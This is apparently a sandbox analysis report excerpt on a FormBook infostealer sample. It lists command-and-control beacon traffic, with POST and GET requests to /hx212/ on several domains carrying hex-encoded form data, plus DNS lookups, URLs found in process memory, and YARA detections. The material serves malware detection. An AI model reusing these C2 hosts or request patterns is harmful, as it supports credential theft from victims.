78 4a 37 62 28 61 4c 41 58 38 41 38 4c 37 45 75 6a 74 38 69 52 45 50 30 53 66 57 48 4a 35 65 7a 6d 41 73 6e 51 32 72 73 71 65 47 48 67 78 78 51 28 5f 75 62 76 51 50 34 41 58 31 5f 47 66 6d 31 6e 4d 69 4f 4f 4e 63 6d 6e 70 42 58 41 47 73 78 59 76 31 5f 5a 6c 41 39 50 76 6d 4f 4d 38 30 74 4f 74 30 47 35 43 32 41 33 6a 70 57 65 76 47 4c 4b 4d 6f 67 45 35 38 50 75 42 50 34 7e 38 6b 48 32 69 5a 42 4d 45 75 63 39 45 72 35 68 73 43 41 30 58 49 65 33 77 54 68 74 6b 4f 61 66 59 35 67 52 48 7a 4d 28 68 6a 70 41 6b 33 6e 4f 56 6e 73 77 54 34 6b 4b 41 4e 76 7e 47 65 39 54 53 6e 30 33 41 68 36 69 55 38 52 4f 34 62 6c 41 72 38 39 63 53 6e 4a 70 50 48 5a 4d 42 48 35 68 4b 66 58 63 68 33 71 32 34 53 78 58 59 28 53 73 7a 44 35 4e 4b 43 6a 44 79 4d 42 32 36 31 6f 49 70 44 54 67 48 78 75 34 46 4a 69 69 68 66 61 6b 63 4b 48 65 32 49 51 48 78 62 48 6c 50 57 2d 6a 66 39 4d 6e 4d 63 63 56 65 72 45 6a 31 46 6a 4f 63 63 45 35 68 4e 6b 31 33 39 30 32 57 6c 58 75 79 73 44 72 58 4a 4d 38 5a 41 68 62 66 32 55 39 71 74 4d 45 46 6d 47 41 4b 71 6d 71 6c 4a 58 37 36 7a 6d 67 7a 45 62 54
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.artysancr.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.artysancr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artysancr.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 52 4f 7e 37 73 6a 34 64 36 44 5a 4e 67 31 35 72 32 76 79 58 34 2d 53 51 39 49 57 75 7a 7a 59 4d 35 4e 66 48 5a 38 54 33 4c 4a 74 6b 4c 57 44 6a 78 66 59 76 32 65 70 4e 56 2d 47 2d 31 4d 71 44 38 34 44 63 75 78 42 56 42 53 39 73 6d 6b 28 6f 38 42 7e 75 32 68 35 64 46 4f 7e 64 47 45 4a 64 73 78 6b 50 79 77 76 6c 65 6e 53 4e 75 5a 6e 4d 39 5a 58 6d 73 50 37 4e 58 4a 7e 57 5a 77 6a 64 51 57 68 70 53 4c 68 66 58 42 63 59 58 58 53 57 4d 72 39 5f 59 66 47 77 28 52 62 78 28 59 79 73 41 61 79 38 65 5a 5a 67 48 77 4c 38 68 44 64 56 7e 73 38 75 68 69 4d 37 6c 75 66 43 43 47 79 33 79 73 48 4f 71 47 46 71 44 57 68 59 4c 50 4d 48 65 52 63 37 5a 30 52 78 44 57 43 39 79 35 79 64 71 54 6d 6b 42 41 54 61 7e 2d 28 6b 74 4e 72 39 6c 45 28 49 78 74 6c 56 34 4d 47 52 6d 57 4c 42 4c 78 31 30 44 36 4f 38 6e 53 39 4d 6f 63 28 73 5a 67 37 72 65 4e 35 74 38 73 48 62 4e 59 56 6b 49 41 38 62 6a 70 74 6d 49 45 45 38 31 76 57 6e 7a 51 4c 32 4f 42 67 4f 46 30 62 44 32 55 6e 48 65 6d 42 43 39 76 53 42 79 39 36 77 37 54 53 4d 4b 59 54 59 42 41 52 63 28 58 4b 4f 78 37 4f 63 7e 6b 68 70 6a 6a 53 47 64 48 72 47 61 37 34 42 63 45 74 36 31 6a 33 68 59 61 43 78 6f 46 4b 4b 51 65 75 6f 6e 6d 57 6f 55 46 4a 6c 7e 4c 75 44 32 67 5a 71 76 41 49 46 4a 43 4b 37 4a 72 70 55 33 73 73 6e 47 75 79 57 63 47 42 2d 54 61 71 4d 75 4c 65 75 4d 5f 47 48 4c 71 79 4f 76 4f 68 30 63 42 68 4e 45 66 72 58 65 36 79 56 58 2d 48 49 46 6b 4a 50 4e 4b 37 57 62 50 64 77 4c 6e 34 55 46 7a 57 74 62 4c 34 51 4a 35 67 62 67 46 33 6f 59 6a 74 7a 55 67 6b 57 70 68 6b 70 35 79 51 76 4e 4e 41 68 42 72 49 69 4b 67 41 5a 4d 57 72 66 77 6b 41 65 72 4a 47 64 75 33 4b 55 49 78 4c 41 37 39 72 6b 30 4e 7a 31 30 51 71 42 75 45 51 5f 66 30 5a 37 5a 4c 6c 56 71 6c 53 67 4b 63 71 31 28 50 6a 53 6c 76 6e 66 54 52 55 37 72 79 61 4d 65 71 63 63 30 4f 5a 52 6e 6b 53 4a 41 75 47 36 77 77 72 46 31 4f 76 4b 30 66 6c 6d 36 69 4c 54 65 78 48 74 79 79 34 42 63 66 79 5a 7e 62 62 72 66 55 79 67 4d 6b 61 71 4b 57 28 32 32 31 32 50 38 4e 38 32 62 72 30 59 74 4f 33 64 59 74 77 67 52 7a 52 6b 50 69 7a 6d 46 4c 69 56 62 70 67 5a 63 33 44 6b 65 6a 32 66 58 63 4d 73 33 58 42 50 76 67 66 74 38 47 58 5a 68 31 37 50 46 31 30 65 58 64 6d 65 36 75 69 54 6c 39 4b 75 6f 6f 4e 35 4a 34 4b 69 48 62 73 59 73 44 43 79 69 67 4a 46 30 62 44 4f 79 6b 28 72 69 42 49 30 71 42 33 45 62 69 42 61 6d 51 34 73 49 35 6a 4b 78 75 71 42 76 45 74 37 44 68 31 6a 38 59 75 68 32 36 72 69 75 6a 6c 49 48 61 39 37 6c 49 76 64 7a 58 30 43 66 6d 6c 53 62 69 41 6b 44 78 4c 38 46 42 6a 31 65 64 49 71 42 79 31 65 64 6d 5a 74 68 65 54 54 4b 41 48 75 36 34 39 55 64 43 47 41 48
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.ardrome.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.ardrome.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ardrome.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 34 6f 54 54 4b 71 49 58 73 33 7a 49 6e 54 48 5f 64 64 54 56 72 6d 42 50 38 36 43 35 76 38 75 4a 43 42 33 45 54 65 6d 30 64 30 75 41 6a 67 65 34 34 48 6d 79 4f 59 53 4e 49 68 44 31 58 74 4d 78 58 5f 6c 50 75 5f 74 76 59 69 6f 43 41 4a 53 6f 70 5a 69 57 42 4f 70 6b 79 68 32 51 41 32 41 79 32 59 4c 78 48 2d 66 48 52 6a 67 71 54 74 6d 55 36 5f 6a 50 74 34 38 54 56 54 47 52 51 4f 35 78 66 63 55 49 6e 67 62 76 4b 75 42 63 66 42 68 42 30 48 59 6a 74 44 7e 41 55 4e 73 48 57 4a 69 55 34 6e 37 52 64 38 55 4c 76 58 69 54 52 52 36 4d 58 79 7e 33 43 63 56 42 32 75 44 56 34 6e 71 51 35 78 49 70 37 6f 58 36 5a 36 54 39 59 4f 46 36 4b 76 55 4c 35 57 55 49 67 67 7e 62 42 4a 78 71 65 47 28 71 69 59 75 5a 30 45 28 6a 6e 76 56 48 76 51 58 4f 34 4b 28 62 67 71 68 79 67 44 4c 79 49 4f 43 73 44 72 4d 64 42 6b 42 57 36 46 59 49 6b 53 35 65 77 77 6f 65 55 36 62 2d 50 46 39 78 46 35 32 58 53 56 51 55 44 50 33 39 43 56 50 64 6c 53 6f 49 66 58 69 4b 42 44 67 61 58 67 53 31 46 74 75 48 36 32 37 73 7a 75 63 42 63 76 4b 51 69 51 31 37 6d 51 72 5a 46 5a 70 30 7a 69 42 74 61 75 56 73 72 45 44 7a 4f 4e 62 68 4a 42 51 34 37 7a 34 6e 58 5a 58 5a 55 33 39 51 72 61 57 73 51 6c 58 76 58 66 59 6a 57 4b 6a 46 59 4e 78 75 6a 4a 39 33 63 68 79 4b 70 62 79 4f 77 4d 77 7a 6e 6d 49 36 55 63 6b 71 53 42 50 38 52 78 56 59 37 76 4c 5a 34 63 76 57 57 6b 28 74 46 33 6a 69 46 34 28 79 42 4e 58 38 77 30 7e 79 6e 53 4e 66 58 38 7e 42 30 79 52 54 31 38 44 47 68 73 6e 78 65 4d 6f 76 42 7a 64 62 6f 65 61 68 54 4b 6e 67 33 65 6a 36 61 77 4c 43 69 63 63 37 42 56 6c 6e 4f 69 43 35 57 57 76 63 71 6c 53 39 45 44 54 4f 75 51 74 51 57 6d 78 54 68 6b 53 39 6a 7a 39 34 6f 5a 56 4b 46 31 4d 42 39 50 75 42 57 6a 33 47 57 6a 4a 61 45 4f 50 6c 75 7a 36 63 4e 69 66 2d 4d 6a 48 4d 37 52 6b 52 51 62 34 4e 48 74 79 43 38 51 50 70 4d 4d 49 4f 32 48 65 31 6c 51 50 35 56 53 5a 61 32 58 79 6d 68 6e 39 69 69 6b 44 31 6b 7a 6b 72 51 63 47 46 7a 53 53 63 49 4c 55 45 56 36 32 69 36 7a 56 6a 36 79 79 5f 6d 34 6c 65 4a 44 69 4e 59 69 5a 6c 47 68 6f 44 33 7a 59 32 69 77 72 75 51 66 39 44 45 59 53 38 62 4e 55 4c 58 67 57 66 42 38 48 4f 50 63 43 64 74 4f 67 69 34 6b 4e 55 33 76 4a 61 6b 71 55 6d 49 45 46 55 6d 76 65 56 35 36 36 39 43 73 66 38 41 71 55 6b 49 68 69 7a 7a 41 72 42 48 59 4e 5f 59 6f 72 36 6f 48 7e 71 69 55 38 38 4c 45 52 6b 4f 4b 79 65 61 41 31 57 72 34 6c 72 44 4b 71 6f 66 73 4c 43 44 58 56 76 76 37 44 39 43 59 33 78 4b 34 38 30 68 53 35 6e 30 5f 66 77 4c 5f 6e 7a 36 42 32 63 6e 55 34 62 51 59 7e 65 6c 70 32 78 6c 75 56 55 58 52 59 59 33 43 76 33 64 4b 78 63 4a 56 41 55 4d 45 30 79 49 4a 41 59 55 4b 4f 4c 54 78 4b
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.xn--u9j813lsxe15po01b.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.xn--u9j813lsxe15po01b.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.xn--u9j813lsxe15po01b.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 7a 53 34 69 73 4e 35 46 30 64 42 67 7a 55 4f 48 6c 7a 67 57 7e 6f 59 48 42 43 63 69 30 30 47 44 67 73 68 63 56 6d 49 39 36 39 5a 77 63 62 6e 53 6c 58 55 34 4c 68 44 4c 57 4d 7a 41 6f 54 6b 35 43 59 78 5a 68 77 7a 6d 73 45 65 6d 33 33 6d 6f 4d 5f 6c 39 70 46 34 49 58 65 65 31 4b 73 48 77 53 45 36 72 4b 55 4c 47 47 2d 6a 59 74 38 6a 62 44 6f 44 30 7e 43 66 51 43 4e 64 4e 70 38 51 35 34 35 6b 61 50 4a 45 55 4f 4a 68 58 6c 6f 51 51 53 78 69 42 66 76 55 33 59 38 56 57 31 6c 74 63 76 79 6e 48 52 48 31 55 44 5f 7a 6d 74 66 33 4b 7e 76 58 77 62 4f 34 45 57 4c 36 77 32 4f 34 51 56 6f 43 43 6f 62 70 66 28 78 50 49 36 55 6d 5a 6c 67 78 6f 47 4a 76 34 46 4d 68 5a 6f 74 4c 4b 57 72 32 76 51 41 4f 48 31 6c 74 50 53 42 62 49 33 4a 5a 55 65 70 4c 5a 57 4f 56 35 32 4b 71 44 48 53 32 66 50 2d 64 66 4f 30 42 37 59 77 57 43 69 50 32 62 44 47 50 68 72 6d 54 54 62 61 34 65 76 31 41 48 61 72 41 69 4e 46 67 63 31 73 64 4f 6a 4b 54 56 72 6a 4d 49 4a 6f 74 57 49 38 6d 7a 50 6c 43 44 56 67 6f 47 57 35 50 30 46 5f 56 6b 45 5a 39 33 72 35 30 33 6e 37 41 5f 68 55 28 75 43 32 46 69 73 7a 73 74 7a 71 65 38 47 4b 62 47 61 55 6a 39 75 31 31 61 7e 35 56 51 65 69 63 49 32 70 37 6f 5a 79 77 37 77 79 39 37 39 6a 68 39 7a 70 67 43 53 79 33 75 30 77 51 47 37 44 6e 4e 71 6b 45 51 73 55 58 38 67 48 71 68 6c 7a 62 43 32 4a 7e 73 66 64 62 6b 75 5a 50 41 74 62 4f 42 64 6c 47 4a 64 6b 68 59 73 73 4b 57 6e 75 30 58 67 4a 28 31 67 68 46 36 59 51 6d 61 4c 42 7a 39 7a 66 6c 32 37 66 68 36 52 79 6b 6e 54 39 6b 42 51 55 66 51 39 65 78 39 4b 56 66 6d 78 39 31 59 70 64 4a 51 68 6c 68 4d 65 68 65 4d 71 66 52 55 74 34 4d 4e 73 37 6c 67 35 78 4f 50 41 52 6f 59 6f 7a 5a 44 35 2d 7e 71 43 67 73 34 70 68 76 6b 28 63 7a 7a 71 32 4c 35 67 4d 4b 52 43 6c 6b 66 6c 5f 6f 2d 70 39 69 62 42 32 48 39 37 42 53 59 39 52 37 46 71 72 38 38 58 42 45 31 78 49 61 6d 55 61 28 78 73 6e 33 51 6c 63 68 4a 67 79 30 78 77 79 59 4e 51 77 48 37 4e 32 73 38 28 6a 63 50 78 6f 79 52 72 77 49 6f 53 71 6d 57 44 43 71 68 70 2d 6e 45 61 36 6e 62 66 64 6b 32 4d 68 5a 68 56 78 46 6b 65 4b 65 6c 37 77 59 6d 6a 62 44 6c 38 73 57 65 76 37 6a 74 51 65 6e 49 72 37 67 66 69 54 52 37 4b 37 71 62 31 77 58 4a 30 6e 72 30 47 4b 31 57 79 62 6f 49 63 56 59 75 65 6c 55 64 56 6c 66 73 51 77 6b 4f 6e 4b 6e 5a 78 63 65 4c 6e 47 4a 6e 7e 2d 35 48 28 35 64 44 57 77 4a 48 28 73 57 6d 61 44 67 59 58 55 43 30 35 63 53 7a 35 48 31 35 79 79 30 4b 4f 5a 41 50 4f 42 30 49 48 6f 48 6f 58 5a 38 78 53 6d 6d 33 54 44 68 39 79 32 6e 35 68 6c 6f 6d 6a 32 4f 43 30 6e 74 39 47 48 50 70 35 54 32 5f 62 66 51 4b 54 33 68 59 50
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=yuATxVRg6V03zt9fmkHVG7SVgWpl6/Z6tDeIEtza45Xi+B/vKHFgBV6ZVx3ahKEkFxT0&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.your-date-here.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=chNEXokLq7hW8HvKkY2dcNEQeJ5GKWGLAWl1+X6aOcyDV8302CPyRRACxVQRPL3iiqaQ&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.agaroseresins.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=2H5oEqApcZqqJ6qLyjFERWiUI7bCbufBKCMghUsAFeTsJ5P0iZtpaBZczhNc8rDwu6V1&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.cszlhz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=bM4Xun1pI6ZOV5ZHYseigAPkvvck2Cij1ewApu5ohFDlZ8aGsxAg5ufu1RC6vK+1jaDm&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.skylineluxuryhomeschicago.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=8sUyA4WO5fe1gCDgOO3DHmlO4MdYzsfah5NcuQxOl3hW/0/R9dWPAXciXHbnM6Y/IAid&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.covpsychiz.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=sml3n6l49EPSCa7vMPh/SuuWi1599qVmQUcMIo3tt8Fu8A6Qgu0IlzGyXmIb1Url3LIn&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.thescarfhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=ZsyByF5b0EkK3lQ42YrSke2rzN/49RgUkpyRf/X/Lp8mJH7kxaV2xoRALuGc5Mm0xYDM&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.artysancr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=wKfpUO9plDGv2T++KqO84WhM5OOWvYWxYhu9D8K5Zh6fySGSwmXnDP6Ufhr7dtYnSq9Q&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.ardrome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=7w0YytMHoI4nsjP+y0IMrc86PWQ/iAHGw4E6AnUW3tdwa4iK0mJdGm+TIKrUlQMYe/Zk&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.xn--u9j813lsxe15po01b.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.your-date-here.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.agaroseresins.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.agaroseresins.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.agaroseresins.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 55 44 42 2d 4a 4e 42 57 70 4d 51 77 6c 47 36 33 30 34 6e 62 48 74 4d 50 5a 37 74 4a 45 31 43 4b 56 54 38 78 6b 58 71 57 50 63 4b 31 46 76 75 70 34 67 43 2d 65 42 52 67 69 54 59 77 47 36 44 34 28 39 69 32 67 44 30 66 46 38 7a 6e 79 75 45 71 49 66 69 4b 69 78 52 33 49 48 6d 36 78 4c 72 55 33 62 65 39 76 43 73 36 51 6b 73 4d 32 5f 39 6e 78 55 6c 53 41 37 36 6f 71 5f 51 4d 53 50 77 66 36 62 38 74 69 77 38 35 44 6f 59 44 46 70 43 77 6f 4b 64 51 39 64 28 44 39 30 4f 67 39 63 33 54 53 7a 42 32 45 46 76 45 4b 45 50 42 42 66 44 65 70 33 69 51 6b 51 53 31 34 38 44 4e 42 34 4a 74 44 77 35 37 5a 71 74 68 74 43 65 77 43 49 38 48 6e 4e 39 44 58 6e 61 48 4b 50 78 45 47 76 33 50 6b 6f 79 75 35 56 33 6a 4c 76 38 6f 4e 79 5a 43 48 53 62 31 38 32 64 52 6c 41 37 33 33 33 28 74 49 30 34 52 4d 38 71 76 64 6e 54 38 38 55 59 69 77 44 34 71 41 45 39 6d 38 52 50 59 31 65 4e 36 55 7a 52 79 76 38 71 4d 35 55 41 41 62 57 52 65 51 6d 55 4f 66 59 6d 7a 64 47 34 41 33 45 58 32 55 49 64 51 7e 6b 4d 31 4b 68 50 75 47 4a 6b 6a 45 43 63 65 69 52 6e 5a 61 51 6f 41 33 42 6f 4d 46 4b 32 52 44 72 68 4a 52 38 42 4c 66 30 73 51 62 4d 44 5a 7a 6e 63 72 6a 5a 53 31 58 58 4f 66 44 76 63 69 30 41 28 7a 30 6a 64 2d 79 54 4b 79 7a 65 6b 57 42 32 72 70 6b 55 71 46 6a 71 45 50 50 53 55 4f 52 67 41 6b 61 72 56 59 28 30 68 64 48 4b 46 6c 4d 78 50 75 7a 77 36 64 59 6e 45 61 35 38 66 65 51 47 44 4c 39 44 75 4a 46 30 57 76 41 66 30 49 33 7a 68 6d 59 50 6a 4e 36 65 66 6b 4f 55 74 39 4f 46 68 49 7a 59 7e 65 51 67 58 50 55 49 6e 4b 42 46 74 72 4b 75 69 6c 68 62 68 46 4e 36 64 45 44 6e 41 4f 51 32 59 74 33 6f 6e 41 4c 56 43 6b 66 46 52 58 57 45 43 4c 47 35 46 6e 4b 32 68 56 69 78 4a 35 4e 48 31 62 53 39 67 72 54 55 37 54 7a 46 44 62 4d 2d 5a 34 69 72 73 42 49 39 33 6e 47 76 68 41 28 78 6a 33 64 30 74 70 4f 52 57 77 49 31 66 76 55 78 6b 62 66 33 78 6a 6e 35 66 34 76 58 37 6e 66 46 57 75 30 61 79 4e 58 61 50 6a 53 71 6f 68 4b 69 46 43 71 61 34 4a 30 41 67 72 46 67 42 7a 68 48 62 38 35 62 4f 4a 4a 66 39 43 4d 33 50 4b 50 5f 28 42 76 70 56 6e 4c 55 4c 57 35 35 71 58 46 65 75 71 7e 75 57 73 39 47 68 55 54 62 45 41 42 5a 53 32 77 6c 7e 36 78 63 68 73 77 64 61 42 42 57 49 73 48 68 31 55 5a 6d 59 43 76 55 6a 56 32 5a 6d 4e 34 37 43 65 70 63 61 45 28 67 6b 68 65 75 6c 66 47 70 45 68 41 79 35 57 69 42 6c 37 65 38 77 4f 61 68 62 63 54 55 31 47 4f 6f 65 34 51 35 38 73 33 5a 41 42 78 37 71 5f 67 7a 58 4b 4d 34 4a 54 6d 64 56 43 45 6d 6f 66 4e 76 6c 59 69 72 70 75 34 4f 49 6f 73 51 71 39 7a 77 4f 5f 5a 77 36 45 65 48 6e 50 37 6d 57 32 5a 61 68 5a 30 43 64 4c 6f 41 53 34 6f 51 59 2d 4f 53 30 75 6c
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Apr 2020 14:51:38 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 329Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 78 32 31 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hx212/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.578591179.0000000002630000.00000004.00000001.sdmpString found in binary or memory: http://ns.adob1
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: http://www.google.ch/
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: http://www.google.ch/q
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp%
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 00000007.00000003.782140485.000000000004E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?ci
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=19
Source: chkdsk.exe, 00000007.00000003.782140485.000000000004E000.00000004.00000001.sdmpString found in binary or memory: https://ogs.go
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=1901
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=ssl
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslLMEMhh_
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/favicon.ico

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
